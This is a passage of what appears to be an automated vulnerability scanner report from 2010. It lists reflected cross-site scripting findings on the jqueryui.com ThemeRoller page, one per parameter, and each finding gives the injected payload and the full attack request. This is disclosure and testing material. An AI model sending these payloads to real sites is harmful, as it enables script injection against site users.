gImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4800b"><script>alert(1)</script>577c180fa0c was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f4800b"><script>alert(1)</script>577c180fa0c&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b6a"><script>alert(1)</script>69ecd42034e was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb0988b6a"><script>alert(1)</script>69ecd42034e&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb08"><script>alert(1)</script>c5888f9db9a was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4pxcbb08"><script>alert(1)</script>c5888f9db9a&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ffad"><script>alert(1)</script>c201a131bf9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px3ffad"><script>alert(1)</script>c201a131bf9 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48878"><script>alert(1)</script>450737abb18 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f0048878"><script>alert(1)</script>450737abb18&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3de"><script>alert(1)</script>b2a0e37ea13 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=3333334e3de"><script>alert(1)</script>b2a0e37ea13&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61800"><script>alert(1)</script>1a28793f45b was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c461800"><script>alert(1)</script>1a28793f45b&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4a5"><script>alert(1)</script>a8177aafd39 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff2e4a5"><script>alert(1)</script>a8177aafd39&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e25"><script>alert(1)</script>bbf4528bd5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff85e25"><script>alert(1)</script>bbf4528bd5e&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a5d"><script>alert(1)</script>ddc6b19163f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=36363644a5d"><script>alert(1)</script>ddc6b19163f&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb649"><script>alert(1)</script>78dbef2ed8c was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405eb649"><script>alert(1)</script>78dbef2ed8c&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fd4"><script>alert(1)</script>29d7d472bd3 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif12fd4"><script>alert(1)</script>29d7d472bd3&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4afc"><script>alert(1)</script>59f5feaeb48 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1eme4afc"><script>alert(1)</script>59f5feaeb48&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff